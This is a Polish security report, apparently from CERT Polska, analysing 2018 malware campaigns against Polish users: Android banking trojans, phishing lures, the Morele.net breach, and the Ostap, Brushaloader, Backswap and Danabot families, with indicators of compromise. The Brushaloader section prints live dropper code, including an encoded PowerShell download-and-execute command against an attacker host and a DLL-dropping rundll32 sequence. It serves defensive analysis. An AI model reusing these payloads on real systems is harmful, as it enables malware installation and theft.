Warto zaznaczyć, że urządzenia z systemem Android domyślnie nie pozwalają na instalowanie apli-kacji spoza oficjalnego sklepu Google. Użytkownik, który na własne ryzyko chciałby pobrać i zainsta-lować taką aplikację, może w konfiguracji zabezpieczeń systemowych zaznaczyć opcję “Zezwól na instalację aplikacji z nieznanych źródeł” - stanowczo odradzamy tego typu rozwiązania. Nieoficjalne sklepy z aplikacjami, a także witryny internetowe podszywające się pod znane marki, stanowią obec-nie jedną z najchętniej stosowanych metod dystrybucji złośliwego oprogramowania. Udostępniona na fałszywej stronie instrukcja skłaniała użytkownika do zmiany konfiguracji urządzenia, a następ-nie pobrania i instalacji złośliwego kodu. W wyniku błędu popełnionego przez przestępcę, osoba odwiedzająca witrynę nie miała czasu na zapoznanie się z instrukcją - krótko po wejściu na stronę następowało przekierowanie do adresu, z którego pobierany był malware32.

Instalator złośliwego oprogramowania wnioskował o przydzielenie dostępu do wielu krytycznych funkcji:

Złośliwa domena, o którą odpytywał uruchomiony malware, jest obecnie nieaktywna. Analiza zawar-tych w próbce artefaktów pozwala przypuszczać, że stanowiła ona pierwszy etap (dropper) trojana bankowego Exobot33. Co ciekawe, niemal równolegle prowadzona była inna kampania (Aplikacja UPS), odsyłająca do strony http://przesylkadodomu[.]info/odbierz-paczke/, zajmując się dystrybucją tej samej próbki34.

31 https://niebezpiecznik.pl/post/sms-rodo-certyfikat-lte/32 https://niebezpiecznik.pl/post/sms-rodo-certyfikat-lte/33 https://securityintelligence.com/ibm-x-force-delves-into-exobots-leaked-source-code/34 https://twitter.com/pr3wtd/status/995214524851671040

Rysunek 18. Lista uprawnień wymaganych przez instalowaną aplikację.

modyfikacja ustawień systemowych

dostęp do kontaktów

określanie geolokalizacji

dostęp do komunikacji SMS/MMS

dostęp do zawartości karty SD

wykonywanie połączeń, dostęp do informacji o sieci, numerze abonenta, statusie połączeń


Wskaźniki infekcji35, 36

Instalator aplikacji:- Certyfikat (ybtdrnon.lpydlhqlraoibnxhpw) SHA256: 53e32d2a0347fc959388b07560994a601477d2887ad7fa1199ab0bc6815ebe17

Powiązane domeny:- vrte62.com- przesylkadodomu.info- sdsdsdsdaas.tk

Rysunek 19. Zrzut ekranu ze strony nakłaniającej do zmiany konfiguracji urządzenia i pobrania szkodliwej aplikacji (źródło: Twitter - @pr3wtd).

35 https://twitter.com/pr3wtd/status/99521452485167104036 https://niebezpiecznik.pl/post/sms-rodo-certyfikat-lte/


Aktualizacja sterownika LTE 5.0

Niespełna 10 tygodni od momentu rozesłania polskim użytkownikom wiadomości nakłaniającej do instalacji szkodliwej aplikacji z podstawionej witryny, przeprowadzono kolejną kampanię pod szyl-dem LTE. Tym razem przestępcy nakłaniali do wizyty na fałszywej stronie, wysyłając wiadomości SMS lub dzwoniąc do wybranych osób37.

Treść SMS-a sugerowała konieczność wejścia na stronę http://aktualizacja-lte5.pl w celu zapozna-nia się z instrukcją aktualizacji oprogramowania. Podobny schemat został zastosowany przez prze-stępców w rozmowach telefonicznych. Atakujący przedstawiając się ofierze jako operator sieci ko-mórkowej, tłumaczył konieczność pobrania stosownej aktualizacji. Rezygnacja z instalacji poprawki, określanej jako sterownik LTE 5.0, miała skutkować brakiem zasięgu i brakiem możliwości wyko-nywania połączeń. Na stronie zastosowano zabieg socjotechniczny, w wyniku którego użytkownik zezwalał na instalację oprogramowania z nieoficjalnych źródeł i infekował się bankowym trojanem (tym razem był to RedAlert).38, 39

37 https://niebezpiecznik.pl/post/aktualizacja-sterownika-lte-sms/38 https://twitter.com/NaxoneZ/status/101912224181928345639 https://niebezpiecznik.pl/post/aktualizacja-sterownika-lte-sms/

Rysunek 20. Złośliwa aplikacja wnioskuje o zostanie administratorem urządzenia / lista aplikacji, którym przydzielono uprawnie-nia administracyjne.

Rysunek 21. Fragment komunikacji zainfekowanego urządzenia, prezentujący próbę zarejestrowania się na serwerze przestępcy.


BZWBKlight

Pod koniec lipca 2018 r. w sklepie Google Play zaobserwowano fałszywą aplikację podszywająca się pod bank - BZ WBK. Narzędzie zostało przedstawione jako szybsza i bardziej uproszczona wer-sja dotychczasowej aplikacji mobilnej banku. Do głównych zadań malware’u należało wykradanie danych logowania do bankowości mobilnej oraz przechwytywanie kodów SMS uwierzytelniających operacje. Złośliwe oprogramowanie było dystrybuowane za pośrednictwem sklepu Google, wyświe-tlało się w wynikach wyszukiwania, a także było promowane za pomocą reklam w Google AdWords, w serwisie Wykop.pl oraz w mobilnych serwisach z grami41. Ostrożność użytkownika w pierwszej ko-lejności powinien wzbudzić nieznany wydawca (West Corp Services) oraz adres e-mail dewelopera [email protected] - różny od tego, z którym powiązana była oficjalna wersja aplikacji.


Instalator aplikacji:- LTE 5 (com.asifdwbq3fsd.dfwiuwzifnsi) SHA256: 76d0ce5553c43e180f327fa5142b47b61d38c85888521763b0cbf86a46895521

Adresy IP:- 46.161.42.163:7878

Powiązane domeny:- qwnqwtwitter.com- aktualizacja-lte5.pl


Instalator aplikacji:- BZWBKlight (pl.zachodni.light) SHA256: 7fe1e261ecf70d1002a7130cc74c9c4e6e7cff0d34036f13f2463d96069ba990

Rysunek 22. Fałszywa aplikacja bankowa w sklepie Google (źródło: Niebezpiecznik.pl).

40 https://niebezpiecznik.pl/post/aktualizacja-sterownika-lte-sms/41 https://zaufanatrzeciastrona.pl/post/uwaga-na-nieustajace-ataki-na-klientow-bz-wbk-w-sklepie-google-play/42 Tamże


KampaniapodszywającasiępodNiebezpiecznikiOrange

Pod koniec sierpnia 2018 r., na skrzynki e-mail polskich użytkowników (wśród adresatów znalazły się między innymi osoby z adresami dostępnymi w bazie CEIDG) trafiła wiadomość, której nadawca podszywał się pod serwis Niebezpiecznik.pl. Autor maila informował o masowych infekcjach, zachę-cając do wejścia na stronę http://www.orangę.pl/cybertarcza i przeskanowania urządzenia aplikacją antywirusową43.

Użytkownik mógł dostrzec, że przesłany link zawiera celowo popełnioną literówkę, prowadząc do podszywającej się pod Cybertarczę Orange phishingowej witryny http://xn--orang-n0a.pl/cybertar-cza (adres po konwersji na punycode44). Jeżeli odwiedzająca stronę osoba uległa sugestii, że jej urządzenie wymaga skanowania, trafiała na kolejną podstronę informującą o wykryciu wirusa. Fał-szywe zalecenie nakłaniające do pobrania antywirusa prowadziło do znanej z poprzednich kampanii instrukcji instalowania aplikacji z nieznanych źródeł oraz odnośnika pobierającego bankbota Anubis. Pobrana aplikacja przedstawiała się jako Uber App - nie pasująca do kontekstu nazwa może suge-rować wykorzystanie próbki w więcej niż jednej kampanii.

Rysunek 23. Witryna phishingowa podszywająca się pod CyberTarczę Orange (źródło: Niebezpiecznik.pl).


Instalator aplikacji:- Uber App (cihomy.iatfxismdobcaqqg.yikltdmmxgizz) SHA256: 849fc58b3a7310f67f98b94259b9c4f2f2beb28fd0ef5b8092d77ece9fd3fc40

Powiązana domena:- xn--orang-n0a.pl/cybertarcza

Adresy URL:- http://ktosdelaetskrintotpidor.com- http://sositehuypidarasi.com

44 https://pl.wikipedia.org/wiki/Punycode45 https://niebezpiecznik.pl/post/atak-orange-niebezpiecznik-cybertarcza/46 Tamże


InPost

Regularnie obserwowanym scenariuszem dystrybucji złośliwego oprogramowania jest podszywanie się przestępców pod firmę kurierską lub dostawcę przesyłek. Na początku listopada zaobserwo-waliśmy kampanię polegającą na podszywaniu się pod operatora sieci paczkomatów InPost. Atak polegał na przesłaniu wiadomości SMS do użytkownika z informacją o oczekującej przesyłce i od-nośnikiem do fałszywej domeny.

Link przekierowywał na stronę, gdzie można było pobrać i zainstalować aplikację z nieoficjalnych źródeł. Instalując aplikację (narzędzie do śledzenia przesyłek), użytkownik infekował się jednym z wariantów trojana bankowego Anubis, łączącego w sobie złośliwego bankera, narzędzie typu RAT i oprogramowanie ransomware.

Rysunek 24. Domena ze zmienionym znakiem, prowadząca do serwera kontrolowanego przez przestępców.

Rysunek 25. Phishingowe strony podszywające się pod InPost.


Wskaźniki infekcji

Instalator aplikacji:- Android Service (com.aqgkigxqck.jovgek)SHA256: dfd28df17b6e1d3d9f1e71847358acc952032bba972d96b3ba6705e6d3f7c1e5- InPost (com.voxrycgojujq.staxms)SHA256: c250640d2c57be3c80defba417c9801b4083a7b438dbe46dc8bb0687a3515a7b

Powiązane domeny:- inqost.pl- paczkomaty.tk

Adresy URL:- https://twitter.com/Sh666Ca- https://twitter.com/Paulina39484624- http://krcbkushr8sushofurnkhufkjvnstgvt.com- http://ktosdelaetskrintotpidor.com- http://sositehuypidarasi.com

Wyciek danych ze sklepu Morele.net

20 grudnia 2018 r. na łamach serwisu Wykop.pl pojawiła się relacja47 z próby szantażu przedstawicieli sklepu internetowego Morele.net. Autor wpisu przedstawił korespondencję prowadzoną z pracowni-kami oraz dowody na przełamanie zabezpieczeń serwera sklepu, dzięki czemu wykradł bazę danych użytkowników. Były to m.in. imię i nazwisko, adres e-mail, numer telefonu i hasło w niejawnej formie (hash). Za nieujawnianie informacji o włamaniu, zażądał okupu w kwocie 15 BTC, co przy kursie z tamtego dnia wynosiło 200 tys. PLN.

„Cześć wykopkowicze. Ostatnio natknąłem się na pewien otwarty serwer i był to serwer morele net, niezabezpieczone żadne porty, otwarty php-myadmin i najcudowniejszy framework na świecie, który jest wystawiany na światło dzienne.”

47 http://www.wykop.pl/ramka/4704903/morele-net-historia-by-xarm/


Co ciekawe, już miesiąc wcześniej (przynajmniej od 21 listopada 2018 r.) klienci sklepu otrzymywali wiadomości SMS nakłaniające do dopłaty niewielkiej kwoty do zamówienia. W treści znajdował się link prowadzący do fałszywej bramki dotpay. Mechanizm działania tego oszustwa polega na wyłu-dzeniu danych do bankowości elektronicznej. W czasie rzeczywistym złodzieje logują się do banku ofiary, dodają odbiorcę zaufanego i przy użyciu bramki wyświetlają prośbę o podanie kodu SMS. Nieświadomi użytkownicy bardzo często przepisują kod, nie czytając treści wiadomości. Najczęściej po takim zabiegu możliwe jest całkowite opróżnienie konta ofiary, bez potrzeby uwierzytelniania drugim składnikiem (por. str. 61).

Rysunek 26. Fragment rozmowy włamywacza z przedstawicielami Morele.net opublikowane w serwisie Wykop.pl.

Rysunek 27. Fałszywy SMS (źródło: zaufanatrzeciastrona.pl).


Początkowym wektorem ataku najprawdopodobniej był niezabezpieczony dostęp do interfejsu de-weloperskiego aplikacji sklepu. Umożliwiało to odczyt plików konfiguracyjnych, zawierających dane dostępowe do serwera bazodanowego.

10 stycznia 2019 r. na stronie Urzędu Ochrony Danych Osobowych pojawiła się informacja48 o roz-poczęciu czynności, które mają ocenić działalność Morele.net pod kątem przestrzegania przepisów o ochronie danych.

Ostap

Aktywność obserwujemy od 2016 roku. Jest to dropper napisany w języku skryptowym JScript. Na początku stanowił dość prosty skrypt charakteryzujący się specyficzną obfuskacją, który okresowo pojawiał się na skrzynkach polskich internautów, dystrybuując różnego rodzaju bankery, takie jak KBot czy ISFB.

W kolejnych kampaniach dropper stopniowo ewoluował, nabierając cech samodzielnego złośliwego oprogramowania. W skrypcie pojawiły się takie funkcje jak:

• detekcja czy malware nie jest wykonywany w sandboxie• mechanizm aktualizacji• dodawanie skryptu do autostartu

W swoim najnowszym wydaniu Ostap jest szeroko dystrybuowany w kampaniach fałszywych faktur i stał się jedną z najaktywniejszych rodzin złośliwego oprogramowania w Polsce w pierwszej połowie 2018 r.

48 https://uodo.gov.pl/pl/138/644

Rysunek 28. Przykład wiadomości e-mail z kampanii Ostap.


Skrypt rozsyłany był w postaci skompresowanego załącznika (będącego rzekomą fakturą) dołą-czonego do wiadomości. Pomimo rozszerzenia RAR, archiwum było w rzeczywistości w formacie ACE, co miało na celu zmylić narzędzia analityczne sugerujące się rozszerzeniem pliku. Mimo tego, program WinRAR był w stanie rozpoznać format archiwum nie biorąc pod uwagę wadliwego rozsze-rzenia i umożliwić ofierze rozpakowanie skryptu.

Ostap znajdował się w archiwum pod postacią pliku JSE, który był zakodowanym skryptem w języku JScript (JScript.Encoded). Ze względu na zastosowaną metodę zaciemnienia, plik po wypakowaniu charakteryzował się dużym rozmiarem, przekraczającym kilkaset kilobajtów.

Dropper używany był do dystrybucji takich rodzin złośliwego oprogramowania jak Nymaim i Backswap. Oba bankery wykorzystywane były przez przestępców naprzemiennie – przez pewien czas Ostap instalował oprogramowanie Nymaim, następnie znów przez jakiś czas dystrybuował Backswapa.

Kampanie złośliwego oprogramowania zakończyły się równie nagle, jak się pojawiły. CERT Polska zauważył wygaszenie aktywności Ostapa w okolicach lipca 2018 r. W drugiej połowie roku Ostap został wyparty z pozycji lidera przez dropper Brushaloader (opisywany w raporcie w kolejnym roz-dziale).

Artykuł analizujący rozwój droppera Ostap na przestrzeni lat można znaleźć na naszej stronie49.

Brushaloader

Brushaloader to dropper napisany w języku skryptowym VBScript, wykorzystywany w kampaniach mailingowych wymierzonych w polskich użytkowników. Pierwsze kampanie wykorzystujące Brusha-loadera zostały dostrzeżone w czerwcu 2018 r.

Treść rozsyłanych maili zazwyczaj była krótka i dotyczyła rzekomej faktury znajdującej się w załącz-niku, w postaci archiwum bądź bezpośrednio jako plik .vbs.

49 https://www.cert.pl/news/single/analiza-zlosliwego-oprogramowania-ostap-backswap-dropper/

Rysunek 29. Złośliwe oprogramowanie dystrybuowane przez Ostap (próbki oznaczone jako Tinba stanowią próbki Backswapa).


W innej wersji Brushaloader był dystrybuowany przez linki postaci http://green.dork-tower.com/oce-an/ms.php?email=2b1d1@abb22. Odnośniki prowadziły do strony, która zawierała skrypt JavaScript przekierowujący użytkownika pod inny adres, z którego finalnie pobierany był plik ze złośliwym opro-gramowaniem. Taki zabieg miał prawdopodobnie utrudnić dotarcie do końcowej domeny przez ser-wisy do zgłaszania stron phishingowych, na przykład PhishTank, które podążają automatycznie za przekierowaniami.

W adresie URL widać również parametr e-mail o wartości 2b1d1@abb22. Podejrzewamy, że war-tość ta stanowi losowo generowany tag pozwalający na korelowanie rozsyłanych maili z zapytania-mi, które przychodzą do serwera dystrybuującego złośliwy kod.

Skrypt Brushaloader charakteryzuje się stosunkowo niewielkim rozmiarem, zwykle nieprzekraczają-cym 1 kB. Łańcuchy znaków zawierające adresy dystrybucyjnie nie są zaciemnione i można w pro-sty sposób odczytać je bezpośrednio z kodu. Innym charakterystycznym elementem jest dodatkowo doklejany kod liczący n-tą liczbę Fibonacciego. Kod skryptu łączy się z zapisanym na stałe w kodzie adresem URL wiele razy, za każdym razem uruchamiając otrzymaną komendę.

Function zmyFaxPc() On Error Resume Next While true dim faxurls, faxdate faxdate = FormatDateTime(Now, vbLongTime) faxurls = „http://107.175.83.15/faxid/633738805/” + faxdate WScript.Sleep 10000 Call zMessage(faxdate, faxurls) WendEnd Function‘ …zmyFaxPc()

Rysunek 30. Przykładowa wiadomość zawierająca Brushaloadera50.

Rysunek 31. Fragment skryptu Brushaloadera51.

50 https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/51 SHA256: a9ae43a208a2100fe6a83b009c907d812e3b726a7cb3e4c18f2835e6b2117792


Charakterystycznym elementem dla Brushaloadera jest wysyłanie złośliwych komend przez serwer dopiero po otrzymaniu odpowiedniej liczby żądań. Odpowiedź na pierwsze żądania w pierwszych wersjach stanowiły losowo generowane liczby, obecnie częściej wysyłana jest komenda Sleep, roz-kazująca programowi czekać. Czas aktywności pojedynczego serwera jest krótki, serwer zazwyczaj przestaje odpowiadać po kilku dniach aktywności. W celu zapamiętywania liczby zapytań wykona-nych przez konkretnego klienta nie są wykorzystywane żadne mechanizmy sesyjne - zamiast tego przestępcy używają adresów IP ofiar.

Cała logika dystrybucji zaimplementowana jest po stronie serwera. Skutkuje to trudnością w przewi-dzeniu zachowania droppera. W ten sposób dochodzi również do opóźnienia instalacji końcowego złośliwego oprogramowania, co utrudnia proces analizy przez sandboxy (zautomatyzowane izolo-wane środowiska). Po kilkunastu zapytaniach otrzymujemy docelowy payload.

Przykładowa sekwencja odpowiedzi na kolejne zapytania wygląda następująco:

1. WScript.Sleep 80002. ....3. WScript.Sleep 80004. Dim Pizde12323, pow231323, pow2234234, nnnn12313:set ZFjkk68932

= CreateObject(„shell.application”):Pizde12323 = „SQBFAFgAIA-AoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGU-AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdA-B0AHAAcwA6AC8ALwB0AGMAcABzAG8AcAB0AG8AbQBzAC4AaQBuAGYAbwA6ADQA-NAAzAC8AYwBoAGsAZQBzAG8AcwBvAGQALwBkAG8AdwBuAHMALwB0AHMAeAB6A-EsAQQBnACcAKQA7AA==”:pow231323 = „cm”:pow2234234 = pow231323 + „d”:nnnn12313 = 0:ZFjkk68932.ShellExecute pow2234234, „ /c po^w^er” + „shell -E^nc „ + Chr(34) + Pizde12323 + Chr(34) + „”, „”, „open”, nnnn12313:set ZFjkk68932 = nothing

5. Dim ztempfolder:Dim mfso:Dim tobjXML:Dim aobjDocElem:Dim lob-jStream:Dim FileName:Const MAadSaveCreateOverWrite = 2 :Const MsadTypeBinary = 1:Set mfso = CreateObject(„Scripting.FileSys-temObject”):ztempfolder = mfso.GetSpecialFolder(2):Set tobjXML = CreateObject(„MSXml2.DOMDocument”):Set aobjDocElem = tobjXML.cre-ateElement(„Base64Data”):aobjDocElem.DataType = „bin.base64”:aob-jDocElem.text = „TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGl-zIHByb2d…”

6. Dim KobjShell, DobjFso, zdtempfolder, SFileName:Set Kobj-Shell = CreateObject(„Shell.Application”):Set DobjFso= Create-Object(„Scripting.FileSystemObject”) :Set zdtempfolder = Dobj-Fso.GetSpecialFolder(2):SFileName = zdtempfolder + „\xPZAUSLEq.dll”:KobjShell.ShellExecute „C:\Windows\System32\rundll32.exe”, zdtempfolder + „\xPZAUSLEq.dll,f1”, „”, „open”, 1:Set KobjShell = Nothing:Set DobjFso = Nothing:Set zdtempfolder = Nothing:

7. ...

Otrzymana seria komend:

• Linia 4 wykonuje polecenie w powłoce Powershell, pobrane spod odpowiedniego adresu:IEX (New-Object Net.WebClient).DownloadString( ‚https://tcpsoptoms.info:443/chkesosod/downs/tsxzKAg’);

• Linia 5 zapisuje na komputerze plik DLL, przekazany w postaci zakodowanej Base64.• Kolejna linia uruchamia plik z punktem wejścia o nazwie “f1”. W tym przypadku instalowanym

złośliwym oprogramowaniem jest banker Danabot.


Brushaloader pobiera i instaluje takie rodziny złośliwego oprogramowania jak Danabot, Backswap czy ISFB/Gozi. Pierwsze dwa z wymienionych również opisaliśmy w tym raporcie (por. str. 52 - 53).

Backswap

Backswap jest bankerem, który pojawił się w Polsce pod koniec pierwszego kwartału 2018 r. To wariant znanego od dawna oprogramowania o nazwie Tinba (od „tiny banker”), którego cechą charakterystyczną jest niewielki rozmiar (mieszczący się zazwyczaj w zakresie 10-50 kB). Na po-czątku dystrybuowany był za pośrednictwem droppera Ostap, który rozsyłany był w kampaniach mailowych związanych z fałszywymi fakturami.

Podobnie jak w przypadku Danabota, omawiany banker wyróżnia się nietypową techniką wstrzyki-wania kodu JavaScript na stronę banku. W tym celu Backswap wykorzystuje mechanizmy dostępne dla każdego użytkownika przeglądarki, symulując działania użytkownika.

Na początku wykonania aktywnie śledzi działania ofiary, w pętli odpytując system operacyjny o to, jakie okno jest w danym momencie “na wierzchu”. W sytuacji, gdy jest to przeglądarka z otwartą stroną znajdującą się na liście celów (np. strona banku), złośliwe oprogramowanie wstrzykuje kod JavaScript. Backswap zamiast ingerować w pamięć skojarzonego procesu, używa skrótów klawi-szowych, aby wkleić kod do konsoli deweloperskiej bądź paska adresu z dodanym prefixem “ja-vascript:”. Wszystko dzieje się poza widokiem użytkownika, gdyż Backswap w pierwszej kolejności ukrywa okno przeglądarki poprzez zmianę jego widoczności na ułamek sekundy.

Tak przeprowadzony atak najbardziej przypomina self-XSS, polegający na skłonieniu użytkownika do samodzielnego wklejenia i uruchomienia złośliwego kodu, pozwalając atakującemu na przejęcie sesji. Niektóre portale, takie jak np. Facebook, bronią się przed tym atakiem, wyświetlając odpowied-ni komunikat przy otwarciu konsoli deweloperskiej.

W przypadku Backswapa, wklejanie i uruchamianie kodu przebiega automatycznie, poprzez symu-lowane akcje klawiatury. Ostrzeżenia w tym wypadku są nieskuteczne, a zablokowanie tego rodzaju ataku wymagałoby blokowania funkcji udostępnianych przez interfejs przeglądarki.

Równie nieszablonowe podejście zastosowano przy przechowywaniu payloadu. Backswap wyko-rzystywał do tego celu obrazy w formacie BMP, wewnątrz których ukrywany był złośliwy kod.

Rysunek 32. Komunikat wyświetlany w konsoli deweloperskiej na portalu Facebook.


Szczegóły techniczne dot. Backswapa zaprezentowaliśmy na naszym blogu53.

Danabot

W maju 2018 r. odkryto54 nową rodzinę trojanów bankowych o nazwie Danabot, skierowaną do m.in. polskich użytkowników bankowości elektronicznej. Liczba zgłoszeń infekcji i ilość kampanii z udziałem tego bankera była niewątpliwie największa względem innych zaobserwowanych przez nas zagrożeń.

Danabot posiada wiele cech typowych dla współczesnych bankerów - budowę modułową oraz do-brze rozwinięty sposób dostarczania konfiguracji i modułów. Konfiguracja modułu odpowiadającego za wstrzykiwanie złośliwego kodu na stronę banku dostarczana jest w formacie wywodzącym się z oprogramowania Zeus, stosowanym również przez inne popularne w Polsce bankery, takie jak ISFB czy Nymaim. Oprócz webinjectów, konfiguracja zawierała również listy nazw procesów pozwa-lających na obsługę portfeli kryptowalutowych.

Rysunek 33. Po prawej przykładowy plik BMP używany przez Backswapa po lewej - oryginalne zdjęcie52.

Wykres 3. Liczba infekcji zaobserwowanych przez oprogramowanie ESET55.

52 https://research.checkpoint.com/the-evolution-of-backswap/53 https://www.cert.pl/news/single/analiza-zlosliwego-oprogramowania-backswap/54 https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-055 https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/

2018-07-22 2018-07-29 2018-08-05 2018-08-12 2018-08-19 2018-08-26 2018-09-02 2018-09-09 2018-09-16


Wektorem ataku były kampanie mailingowe. Trojan pobierany był zazwyczaj przez dropper Brusha-loader (por. str. 49). Czasami zdarzało się jednak, że w załączniku zamieszczany był bezpośrednio plik wykonywalny Danabota, realizujący pierwszy etap infekcji.

Danabot został napisany w języku Delphi. Złośliwe oprogramowanie jest intensywnie rozwijane przez twórców, co zaowocowało pojawieniem się jego licznych wersji. Regularnie powiększano rów-nież zbiór modułów, wzbogacając wachlarz możliwości złośliwego oprogramowania.

Moduły realizowały takie funkcje jak:• komunikacja za pośrednictwem sieci TOR• swobodny dostęp do zaatakowanego komputera poprzez uruchomienie serwera RDP• podsłuchiwanie ruchu sieciowego• wykradanie lokalnych profili zawierających dane logowania (w tym hasła, m.in. Google Chrome,

Mozilla Firefox, Opera)

Połączenia z serwerem C&C realizowane są na porcie TCP/443. Zamiast sugerowanego przez nu-mer portu protokołu HTTPS, do komunikacji wykorzystywany jest autorski protokół.

Mechanizm implementowania webinjectów różni się od realizowanego zazwyczaj przez bankery ataku Man-in-the-Browser. W tym przypadku, Danabot realizuje atak Man-in-the-Middle i wstrzykuje złośliwy kod na stronę banku, wykorzystując do tego lokalny serwer proxy. Danabot pośredniczy w komunikacji HTTPS, modyfikując odpowiedzi zgodnie z konfiguracją otrzymaną od serwera C&C. W systemie instalowany jest zaufany urząd certyfikacji, aby nie wzbudzić zastrzeżeń przeglądarki co do certyfikatu.

Atak MitM może być zauważony przez użytkownika, ponieważ banki zazwyczaj uwierzytelniają się certyfikatem rozszerzonej walidacji (EV SSL), co jest sygnalizowane przez przeglądarkę poprzez wyświetlenie nazwy banku w pasku adresu.

Fałszywe certyfikaty podstawiane przez Danabota nie są certyfikatami EV, ponieważ lista urzędów wydających takie certyfikaty jest z góry zdefiniowana i nie może być w prosty sposób zmodyfikowana z poziomu konfiguracji systemu operacyjnego. Brak nazwy banku w pasku adresu stanowi łatwy do zauważenia sygnał ostrzegawczy.

Aktywność tego malware’u zaobserwowano też w innych krajach. Według raportu ASERT Team56, Danabot miał na celowniku co najmniej 7 krajów, z czego największą aktywność dostrzeżono we Włoszech i w Polsce.

56 https://asert.arbornetworks.com/danabots-travels-a-global-perspective

Rysunek 34. Pasek domeny strony internetowej zabezpieczonej TLS.

Rysunek 35. Pasek domeny strony internetowej z certyfikatem rozszerzonej walidacji (EV SSL).


Anubis

W połowie stycznia na naszym blogu57 pojawiła się analiza jednego z wariantów złośliwego oprogra-mowania, pochodzącego z rodziny BankBot. Opisywany malware wymierzony był w użytkowników aplikacji mobilnych co najmniej 15 polskich banków. Wyłudzając dane logowania oraz potrzebne do autoryzacji kody SMS, umożliwiał kradzież środków z konta ofiary. Niedługo później wzmożoną aktywność wykazała nowa odmiana trojanów bankowych. Anubis, podobnie jak jego poprzednik, atakuje właścicieli urządzeń z zainstalowanym systemem Android. Podobieństwa w kodzie i korela-cje czasowe pozwalają twierdzić, że opisywana rodzina dziedziczy pewne cechy BankBota. Została jednak rozbudowana o nowe możliwości ataku, łącząc w sobie malware bankowy, oprogramowanie typu RAT i popularny w ostatnim czasie ransomware.

Sposób dostarczenia

Dystrybucja Anubisa polegała na umieszczeniu złośliwej aplikacji w serwisie Google Play lub skie-rowaniu użytkownika na fałszywą stronę internetową, skąd pobierany był malware. Przesyłając do swoich ofiar wiadomości SMS, oszuści podszywali się pod znane firmy i usługodawców, informując np. o oczekującej przesyłce (przykłady złośliwych wiadomości zostały opisane w oddzielnym artyku-le na str. 38: „Androidowe kampanie złośliwego oprogramowania”).

Rysunek 36. Przykład wiadomości SMS, odsyłającej do fałszywej witryny.

Zabieg socjotechniczny miał na celu nakłonienie użytkownika do wizyty na podstawionej stronie i pobrania udostępnionej aplikacji. Urządzenia z systemem Android mają domyślnie zablokowaną możliwość instalowania aplikacji z niezaufanych źródeł, co dla przestępców mogło okazać się pew-nym utrudnieniem. Próba ominięcia zabezpieczeń odbywała się poprzez umieszczenie na złośliwej stronie instrukcji, zachęcającej do zmiany konfiguracji urządzenia.

Rysunek 37. Domyślnie zablokowana możliwość instalowania aplikacji spoza sklepu Google.

57 https://www.cert.pl/news/single/analiza-polskiego-bankbota/


W przypadku dystrybucji bankera za pośrednictwem Google Play, atakujący najczęściej korzystali z dropperów. W sklepie Google umieszczana była funkcjonalna wersja dowolnej aplikacji, która po upływie określonego czasu (lub spełnieniu innych ustalonych warunków) przystępowała do pobiera-nia właściwej części złośnika. Miało to na celu oszukanie mechanizmów bezpieczeństwa i opóźnie-nie wykrycia szkodliwej aplikacji.

Przebieg infekcji

Analizowany wariant Anubisa został przygotowany w taki sposób, aby nie wzbudzać podejrzeń u potencjalnej ofiary. Proces instalacji nie wymagał od użytkownika przydzielania dodatkowych uprawnień. Dopiero uruchomienie złośliwego oprogramowania wykazywało wyraźne anomalie. Dało się zauważyć, że z menu systemowego zniknęła ikona aplikacji (celem zabiegu było utrudnienie usu-nięcia złośliwego narzędzia). Następnie ofiara była przenoszona do ekranu ułatwień dostępu. Tam w natarczywy sposób aplikacja wyświetlała komunikat, nakłaniający do przydzielenia jej wymaga-nych uprawnień. Proces wymuszenia był zaprojektowany w taki sposób, aby wywołanie pojawiało się na ekranie w sposób ciągły, do momentu wyrażenia odpowiedniej zgody. W międzyczasie zain-fekowane urządzenie rejestrowało swoją obecność na serwerze C&C.

Rysunek 38. Próba wymuszenia niebezpiecznych uprawnień.

Do panelu przestępcy przesyłany był IMEI ofiary, wraz z adresem IP i nazwą operatora GSM. W bazie danych zapisywana była też wersja systemu operacyjnego, nazwa aplikacji za pomocą której dostarczono malware oraz flaga kraju, z którego łączyło się zainfekowane urządzenie. Za-rządzający botnetem posiadał dostęp do daty i godziny infekcji, a także listy atakowanych aplikacji, zainstalowanych na telefonie ofiary.

Rysunek 39. Widok panelu do zarządzania botnetem.


Komunikacja z botnetem odbywała się za pomocą protokołu HTTP. W celu ograniczenia możliwości wglądu w treść zapytań (np. podczas inspekcji ruchu sieciowego) Anubis korzystał z szyfrowania RC4 (zdefiniowany klucz był zapisany w próbce). Tak przygotowane żądania, kodowane były do postaci base64 i przesyłane do serwera.

POST /private/set_data.php HTTP/1.1Content-Length: 282Content-Type: application/x-www-form-urlencodedUser-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0; ………………../………….)Host: Connection: closeAccept-Encoding: gzip, deflate

p=NGY3…………………………………………………………….…………………………………………………………………...……………………………….……………………………………………………………………...I2ODI=

Ułatwienia dostępu (ang. Accessibility Services) to zbiór wbudowanych w system Android funkcji, stworzonych z myślą o osobach potrzebujących niestandardowych metod komunikacji z urządze-niem. Dzięki nim możliwe jest uzyskanie dostępu do monitora brajlowskiego, sterowanie urządze-niem za pomocą głosu, korzystanie z syntezatora mowy, etc. Niestety, korzystanie z Ułatwień dostę-pu to także chętnie stosowana przez przestępców metoda, biorąca udział w procesie przejmowania kontroli nad urządzeniem. Dobrym przykładem będzie tu wykorzystana przez Anubisa funkcja, pozwalająca wchodzić w interakcję z zawartością wyświetlanych okien i komunikatów bez udziału użytkownika. W ten sposób wymuszana była np. zmiana domyślnej aplikacji do obsługi wiadomości SMS. Kiedy na zainfekowanym urządzeniu wyświetlało się zapytanie o możliwość zmiany, malware podejmował błyskawiczne działanie i odpowiadał twierdząco w swoim imieniu. Krótki czas reakcji na zapytanie i szybkie zamknięcie okna powodowały, że proces przejęcia kontroli nad aplikacją prze-biegał w sposób trudny do zauważenia.

Rysunek 40. Anubis wnioskuje o zmianę domyślnej aplikacji do przesyłania SMS-ów.

Funkcjonalność

